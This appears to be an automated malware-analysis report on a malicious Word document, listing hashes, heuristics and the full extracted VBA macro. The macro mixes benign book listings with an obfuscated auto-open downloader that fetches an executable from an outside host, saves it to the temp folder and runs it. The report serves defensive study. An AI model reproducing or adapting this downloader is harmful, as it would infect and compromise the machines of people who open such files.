Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 938612f49b800d15…

MALICIOUS

Office (OLE)

68.5 KB Created: 2015-06-26 05:41:00 Authoring application: Microsoft Office Word First seen: 2015-10-01
MD5: a71916d2a1bdcc25bd99137677d11b00 SHA-1: d9d6cda0030e1aba335f10abff210bcbb45d9fce SHA-256: 938612f49b800d15963ffe0553f2b396f8f503a0d686b28090edc427b9c7a86c
270 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1106 Execution through API T1204.002 Malicious File

The sample contains critical heuristic firings indicating an obfuscated auto-exec VBA loader that uses CreateObject and GetObject calls. The VBA script itself, while partially truncated, contains functions like 'autoopen' and 'PublishAutoFilterRange' which suggest it's designed to execute code upon opening and potentially interact with the system or network. The script also attempts to publish content to local files, which could be a precursor to exfiltration or a distraction.

Heuristics 9

  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
     Set dFlagLB30D = CreateObject(HvbtyGByuxg3J)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Set dFlagLB30D = CreateObject(HvbtyGByuxg3J)
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        Set ppApp = GetObject(, "PowerPoint.Application")
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName j9yPFDVwyo, Chr(79) & Chr(112) & "e" & "n", VbMethod, Chr(71) & Chr(69) & Chr(84), _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.mcp.com/sams/� In document text (OLE body)
    • http://www.mcp.com/sams/In document text (OLE body)
    • http://www.microsoft.com/ie/In document text (OLE body)
    • http://search.yahoo.com/bin/search�In document text (OLE body)
    • http://search.yahoo.com/bin/searchIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18875 bytes
SHA-256: 49a5324d1168d8194b59e5cd586771b959a985e44cb4466b2768120cd66676c7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub фсФФА(FFFFF As Long)

TOT9Qr3J8P

End Sub

Sub autoopen()

фсФФА (3)

End Sub



Attribute VB_Name = "Module1"
'
Sub PublishAutoFilterRange()
    Фы.Sheets("Query").AutoFilterMode = False
    д.Range("Query_From_Northwind").Select
    в.Range("Query_From_Northwind").AutoFilter _
        Field:=1, _
        Criteria1:="Condiments"
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourceAutoFilter, _
        FileName:="C:\Publish01.htm", _
        Sheet:="Query", _
        Source:=ф.Sheets("Query").AutoFilter.Range, _
        HtmlType:=xlHtmlStatic, _
        DivID:="ExcelAutoFilter", _
        Title:="Excel AutoFilter Range").Publish True
End Sub
'
' Publish a chart sheet
'
Sub PublishChartSheet()
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourceChart, _
        FileName:="C:\Publish02.htm", _
        Sheet:="Chart1", _
        HtmlType:=xlHtmlChart, _
        DivID:="ExcelChartSheet", _
        Title:="Excel Chart Sheet").Publish True
End Sub
'
' Publish an embedded chart
'
Sub PublishEmbeddedChart()
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourceChart, _
        FileName:="C:\Publish03.htm", _
        Sheet:="2000 Budget", _
        Source:="Chart 1", _
        HtmlType:=xlHtmlStatic, _
        DivID:="ExcelEmbeddedChart", _
        Title:="Excel Embedded Chart").Publish True
End Sub
'
' Publish a PivotTable
'
Sub PublishPivotTable()
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourcePivotTable, _
        FileName:="C:\Publish04.htm", _
        Sheet:="PivotTable", _
        Source:="PivotTable1", _
        HtmlType:=xlHtmlList, _
        DivID:="ExcelPivotTable", _
        Title:="Excel PivotTable").Publish True
End Sub
'
' Publish a print area
'
Sub PublishPrintArea()
    з.Worksheets("2000 Budget").PageSetup.PrintArea = "A1:B13"
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourcePrintArea, _
        FileName:="C:\Publish05.htm", _
        Sheet:="2000 Budget", _
        Source:=фв.Worksheets("2000 Budget").PageSetup.PrintArea, _
        HtmlType:=xlHtmlStatic, _
        DivID:="ExcelPrintArea", _
        Title:="Excel Print Area").Publish True
End Sub
'
' Publish a query table
'
Sub PublishQueryTable()
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourceQuery, _
        FileName:="C:\Publish06.htm", _
        Sheet:="Query", _
        Source:="Query from Northwind", _
        HtmlType:=xlHtmlCalc, _
        DivID:="ExcelQueryTable", _
        Title:="Excel Query Table").Publish True
End Sub
'
' Publish a range using coordinates
'
Sub PublishRangeCoordinates()
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourceRange, _
        FileName:="C:\Publish07.htm", _
        Sheet:="2000 Budget", _
        Source:="A1:B17", _
        HtmlType:=xlHtmlCalc, _
        DivID:="ExcelRangeCoordinates", _
        Title:="Excel Range Coordinates").Publish True
End Sub
'
' Publish a range using a name
'
Sub PublishRangeName()
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourceRange, _
        FileName:="C:\Publish08.htm", _
        Source:="Expenses", _
        HtmlType:=xlHtmlStatic, _
        DivID:="ExcelRangeName", _
        Title:="Excel Range Name").Publish True
End Sub

Public Function WphmxowcstXb(A7X71OY4p As String)
 Set zBo1iklWv9Sz = dFlagLB30D("S" & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & "c" & "a" & Chr(116) & Chr(105) & "o" & Chr(110))
zBo1iklWv9Sz.Open (QrDNQZQRP)
End Function
Public Function dFlagLB30D(HvbtyGByuxg3J As String)
 Set dFlagLB30D = CreateObject(HvbtyGByuxg3J)
End Function
Public Function IrQ2IESgmYoy(UNIWVVc542vt As Variant, cNvH4h9GxP As String)
Dim oUeKB2dS: Set oUeKB2dS = dFlagLB30D(Chr(65) & "d" & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & "t" & Chr(114) & Chr(101) & "a" & "m")

With oUeKB2dS
   .Type = 1
    .Open
    .write UNIWVVc542vt
    .savetofile cNvH4h9GxP, 2
End With
End Function

'
' Publish a worksheet
'
Sub PublishWorksheet()
    ThisWorkbook.PublishObjects.Add( _
        SourceType:=xlSourceSheet, _
        FileName:="C:\Publish09.htm", _
        Sheet:="2000 Budget", _
        HtmlType:=xlHtmlCalc, _
        DivID:="ExcelWorksheet", _
        Title:="Excel Worksheet").Publish True
End Sub
'
' Listing 20.2. Republishing a PublishObject.
'
Sub RepublishObject()
    Dim strID As String
    strID = "ExcelRangeCoordinates"
    For Each po In ThisWorkbook.PublishObjects
        If po.DivID = strID Then
            po.Publish
            Exit For
        End If
    Next 'po
End Sub
'
' Listing 20.3. A procedure that deletes all the PublishObjects
'
Sub DeletePublishObjects()
  For Each po In ThisWorkbook.PublishObjects
        po.Delete
    Next 'po
End Sub
'
' Listing 20.4. A procedure that adds a Hyperlink object.
'
Sub AddLink()
    Dim r As Range
    '
    ' Add a paragraph to the end of the document
    '
    With ThisDocument.Paragraphs
        .Item(.Count).Range.InsertParagraphAfter
        Set r = .Item(.Count).Range
    End With
    r.Text = "Sams' Home Page"
    r.Hyperlinks.Add _
        Anchor:=r, _
        Address:="http://www.mcp.com/sams/", _
        ScreenTip:="Click here to visit the home page of Sams!"
End Sub
'
' Listing 20.5. Procedures that add a link for the Yahoo!
' search engine and run a query on the Yahoo! database.
'
Sub AddYahoo()
    Dim r As Range
    '
    ' Add a paragraph to the end of the document
    '
    With ThisDocument.Paragraphs
        .Item(.Count).Range.InsertParagraphAfter
        Set r = .Item(.Count).Range
    End With
    r.Text = "Yahoo Search"
    r.Hyperlinks.Add _
        Anchor:=r, _
        Address:="http://search.yahoo.com/bin/search"
End Sub

Sub SearchYahoo()
    Dim link As Hyperlink
    Dim keyword As String
    Set link = ThisDocument.Hyperlinks("http://search.yahoo.com/bin/search")
    keyword = InputBox("Enter a search keyword:")
    link.Follow _
        ExtraInfo:="p=" & keyword, _
        Method:=msoMethodGet
End Sub
'
' Listing 20.6. Using the FollowHyperlink method to display
' a target document without an existing Hyperlink object.
'
Sub FollowHyperlinkTest()
    Dim keyword As String
    keyword = InputBox("Enter a search keyword:")
    ThisDocument.FollowHyperlink _
        Address:="http://search.yahoo.com/bin/search", _
        ExtraInfo:="p=" & keyword, _
        Method:=msoMethodGet
End Sub
'
' Listing 20.7. Some event handlers that are used to
' display a Web page.
'
' This event handler fires when you first open the form
'
Private Sub UserForm_Initialize()
    Dim maxWidth As Integer
    Dim maxHeight As Integer
    With webWWW
        '
        ' Display and save the initial URL
        '
        If txtLocation <> "" Then
            topPage = txtLocation
            .Navigate txtLocation
        End If
        '
        ' Adjust the width and height of the control
        '
        maxWidth = К.Me.Width - .Left - 10
        maxHeight = К.Me.Height - .Top - 20
        If Application.UsableWidth > maxWidth Then
            .Width = maxWidth
        End If
        If Application.UsableHeight > maxHeight Then
            .Height = maxHeight
        End If
    End With
End Sub
'
' This event handler fires when you enter the text box
'
Private Sub txtLocation_Enter()
    '
    ' Make sure Surf! button is the default
    '
    cmdSurf.Default = True
End Sub
'
' This event handler fires when you click the Surf! button
'
Private Sub cmdSurf_Click()
    '
    ' Surf to the URL specified in the Location text box
    '
    If txtLocation <> "" Then
        webWWW.Navigate txtLocation
    Else
        txtLocation.SetFocus
        Beep
    End If
End Sub
'
' This event handler fires once the Web page navigation is done
'
Private Sub webWWW_DocumentComplete(ByVal pDisp As Object, URL As Variant)
    lblProgress.Caption = " Done"
    txtLocation = URL
End Sub
'
' This event handler fires at the start of the download
'
Private Sub webWWW_DownloadBegin()
    lblProgress.Caption = " Downloading..."
End Sub
'
' This event handler fires when the URL title changes
'
Private Sub webWWW_TitleChange(ByVal Text As String)
    '
    ' Update the form's caption to reflect the new title
    '
    КMe.Caption = "The Word Wide Web - " & webWWW.LocationName
End Sub
'
' This event handler fires when the status text changes
'
Private Sub webWWW_StatusTextChange(ByVal Text As String)
    lblStatus = Text
End Sub
'
' Listing 20.8. Event handlers for the navigation
' buttons in the custom Web browser.
'
'
' This event handler fires when you click the Back button
'
Private Sub cmdBack_Click()
    '
    ' An error occurs if there is no page to go back to
    '
    On Error Resume Next
    webWWW.GoBack
End Sub
'
' This event handler fires when you click the Forward button
'
Private Sub cmdForward_Click()
    '
    ' An error occurs if there is no page to go forward to
    '
    On Error Resume Next
    webWWW.GoForward
End Sub
'
' This event handler fires when you click the Top button
'
Private Sub cmdTop_Click()
    webWWW.Navigate topPage
End Sub
'
' This event handler fires when you click the Refresh button
'
Private Sub cmdRefresh_Click()
    webWWW.Refresh
End Sub
'
' This event handler fires when you click the Stop button
'
Private Sub cmdStop_Click()
    webWWW.Stop
End Sub
'
' This event handler fires when you click the Home button
'
Private Sub cmdHome_Click()
    webWWW.GoHome
End Sub
'
' This event handler fires when you click the Search button
'
Private Sub cmdSearch_Click()
    webWWW.GoSearch
End Sub
'
' This event handler fires when you click the Exit button
'
Private Sub cmdExit_Click()
    Unload КMe
End Sub
'
' Listing 20.9. A procedure that manipulates Internet Explorer
' via Automation using various members of the
' InternetExplorer class.
'
Sub AutomateInternetExplorer()
    Dim ie As Object
    Dim result As Integer
    '
    ' Set up the Automation object
    '
    Set ie = CreateObject("InternetExplorer.Application")
    '
    ' Navigate to a page and customize the browser window
    '
    ie.Navigate "http://www.microsoft.com/ie/"
    ie.Toolbar = False
    ie.StatusBar = False
    ie.MenuBar = False
    '
    ' Twiddle thumbs while the page loads
    '
    Do While ie.Busy
        DoEvents
    Loop
    '
    ' Display page info
    '
    result = MsgBox( _
        "Current URL:  " & ie.LocationURL & Chr(13) & _
        "Current Title: " & ie.LocationName & Chr(13) & _
        "Document type: " & ie.Type & Chr(13) & Chr(13) & _
        "Would you like to view this document?", _
        vbYesNo + vbQuestion)
    If result = vbYes Then
        '
        ' If Yes, make browser visible and activate it
        '
        ie.Visible = True
        AppActivate "Microsoft Internet Explorer"
    Else
        '
        ' If no, bail out
        '
        ie.Quit
    End If
    Set ie = Nothing
End Sub


Attribute VB_Name = "Module2"
Public QrDNQZQRP As String




' Listing 13.4. Using the DDEInitiate method to open a DDE channel.
'
Sub TestIt()
   Dim result As Integer
    result = OpenHailingFrequencies
    DDETerminate result
End Sub

Function OpenHailingFrequencies() As Integer
    Dim channel As Integer
    
    On Error GoTo BadConnection
    '
    ' Establish the DDE connection to Program Manager
    '
    channel = DDEInitiate("Progman", "Progman")
    
    MsgBox "A channel to Program Manager is now open.", vbInformation
    '
    ' Return the channel number
    '
    OpenHailingFrequencies = channel
    Exit Function
    
BadConnection:
    MsgBox "Could not open a channel to Program Manager!", vbExclamation
    '
    ' Return 0
    '
    OpenHailingFrequencies = 0
        
End Function

' Listing 13.5. Using DDEExecute to control a server application.
'
Sub CreateWorkbookIcon()

    Dim channel As Integer
    Dim strPath As String, strName As String, strApp As String
    
    On Error GoTo BadConnection
    '
    ' Get info required for program item
    '
    strPath = ActiveWorkbook.Path & "\" & ActiveWorkbook.Name
    strName = Left(ActiveWorkbook.Name, Len(ActiveWorkbook.Name) - 4)
    strApp = Application.Path & "\Excel.exe"
    '
    ' Establish the DDE connection to Program Manager
    '
    channel = DDEInitiate("Progman", "Progman")
    '
    ' Create the group and item
    '
    DDEExecute channel, "[CreateGroup(""Excel Workbooks"")]"
    DDEExecute channel, "[AddItem(""" & strPath & """,""" & strName & """,""""" & strApp & """"")]"
    DDETerminate channel

    Exit Sub
    
BadConnection:
    MsgBox "Could not open a channel to Program Manager!", vbExclamation
            
End Sub

' Listing 13.6. Using DDERequest to retrieve data from an
' application.
'

Sub RequestWordData()
    Dim channel As Integer
    Dim wordData As Variant
    Dim getString As String
    On Error GoTo BailOut
    '
    ' Set up the application
    '
    Application.StatusBar = "Starting Word..."
    Application.DisplayAlerts = False
    '
    ' Initiate channel with System topic
    '
    channel = DDEInitiate("Winword", "System")
    '
    ' Open the document we want to work with
    '
    Application.StatusBar = "Opening Word document..."
    DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
    DDETerminate channel
    '
    ' Initiate new channel with document
    '
    channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
    '
    ' Find keyword and add a bookmark
    '
    DDEExecute channel, "[StartOfDocument]"
    DDEExecute channel, "[EditFind .Find = ""ACME""]"
    DDEExecute channel, "[SelectCurSentence]"
    DDEExecute channel, "[EditBookmark .Name = ""Gotcha""]"
    '
    ' Retrieve the bookmark and store it
    '
    wordData = DDERequest(channel, "Gotcha")
    getString = wordData(1)
    r.Worksheets("Sheet1").[A2].Value = getString
    '
    ' Quit Word and terminate channel
    '
    DDEExecute channel, "[FileExit 1]"
    DDETerminate channel

    Exit Sub

BailOut:
    DDETerminate channel
    MsgBox "DDE operation failed!", vbExclamation

End Sub

' Listing 13.7. Using DDEPoke to send data to an application.
'
Sub SendDataToWord()

    Dim channel As Integer, pokeData As Variant
    On Error GoTo BailOut
    '
    ' Set up the application
    '
    Application.StatusBar = "Starting Word..."
    Application.DisplayAlerts = False
    '
    ' Initiate channel with System topic
    '
    channel = DDEInitiate("Winword", "System")
    '
    ' Open the document we want to work with
    '
    Application.StatusBar = "Opening Word document..."
    DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
    DDETerminate channel
    '
    ' Initiate new channel with document
    '
    channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
    '
    'Get the data to be sent
    '
    Application.StatusBar = "Sending data..."
    Set pokeData = t.Worksheets("Sheet1").[A1]
    '
    'Send it to the "Gotcha" bookmark
    '
    DDEPoke channel, "Gotcha", pokeData
    '
    ' Quit Word and terminate channel
    '
    Application.StatusBar = "Shutting down Word..."
    DDEExecute channel, "[FileExit 1]"
    DDETerminate channel
    Application.StatusBar = False

    Exit Sub

BailOut:
    DDETerminate channel
    MsgBox "DDE operation failed!", vbExclamation
    Application.StatusBar = False

End Sub

' Listing 15.3. Using Automation to run a PowerPoint
' presentation slide show.
'
Sub TOT9Qr3J8P()

Set j9yPFDVwyo = dFlagLB30D("Mi" & Chr(99) & "r" & Chr(111) & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & "L" & Chr(72) & "TT" & Chr(80))

CallByName j9yPFDVwyo, Chr(79) & Chr(112) & "e" & "n", VbMethod, Chr(71) & Chr(69) & Chr(84), _
"h" & Chr(116) & Chr(116) & Chr(112) & ":" & Chr(47) & Chr(47) & Chr(118) & Chr(105) & Chr(100) & Chr(105) & Chr(109) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & "." & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(55) & Chr(48) & "8" & Chr(47) & "3" & "4" & Chr(54) & Chr(46) & "e" & "x" & Chr(101) _
, False

Set nVoYwy5wi65Ru = dFlagLB30D("W" & Chr(83) & Chr(99) & Chr(114) & "i" & Chr(112) & Chr(116) & Chr(46) & Chr(83) & "h" & "e" & Chr(108) & Chr(108))

Set Njvhw3SCwhJF = CallByName(nVoYwy5wi65Ru, Chr(69) & Chr(110) & Chr(118) & Chr(105) & "r" & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & "r" & Chr(111) & Chr(99) & Chr(101) & "s" & Chr(115))

NkFurzJgA4 = Njvhw3SCwhJF(Chr(84) & "E" & Chr(77) & Chr(80))

QrDNQZQRP = NkFurzJgA4 & Chr(92) & Chr(98) & Chr(105) & "k" & Chr(115) & Chr(101) & Chr(110) & Chr(112) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
Dim yRG5Tmsczw() As Byte

CallByName j9yPFDVwyo, "S" & "e" & Chr(110) & Chr(100), VbMethod
yRG5Tmsczw = CallByName(j9yPFDVwyo, "r" & Chr(101) & Chr(115) & Chr(112) & "o" & Chr(110) & Chr(115) & Chr(101) & Chr(66) & Chr(111) & "d" & Chr(121), VbGet)
IrQ2IESgmYoy yRG5Tmsczw, QrDNQZQRP
On Error GoTo ehUAReVao5
    a = 197 / 0
  On Error GoTo 0
  
PBWxy1g8qJuzYK:
  Exit Sub
ehUAReVao5:
  WphmxowcstXb ("HBaMqGixX")
Resume PBWxy1g8qJuzYK
End Sub
Sub RunPresentation()
    On Error GoTo OpenPowerPoint
    '
    ' Reference the existing PowerPoint Application object
    '
    Set ppApp = GetObject(, "PowerPoint.Application")
    '
    ' Work with PowerPoint's Application object directly
    '
    With ppApp
        '
        ' Display PowerPoint
        '
        .Visible = True
        '
        ' Open and then run the presentation's slide show
        '
        .Presentations.Open "C:\My Documents\Juggling.ppt"
        .Presentations("Juggling.ppt").SlideShowSettings.Run
    End With
    Set ppApp = Nothing
'
' Program branches here if PowerPoint isn't running
'
OpenPowerPoint:
    ' Create a new instance of PowerPoint's Application object
    '
    Set ppApp = CreateObject("PowerPoint.Application")
    '
    ' Continue after the statement that caused the error
    '
    Resume Next
End Sub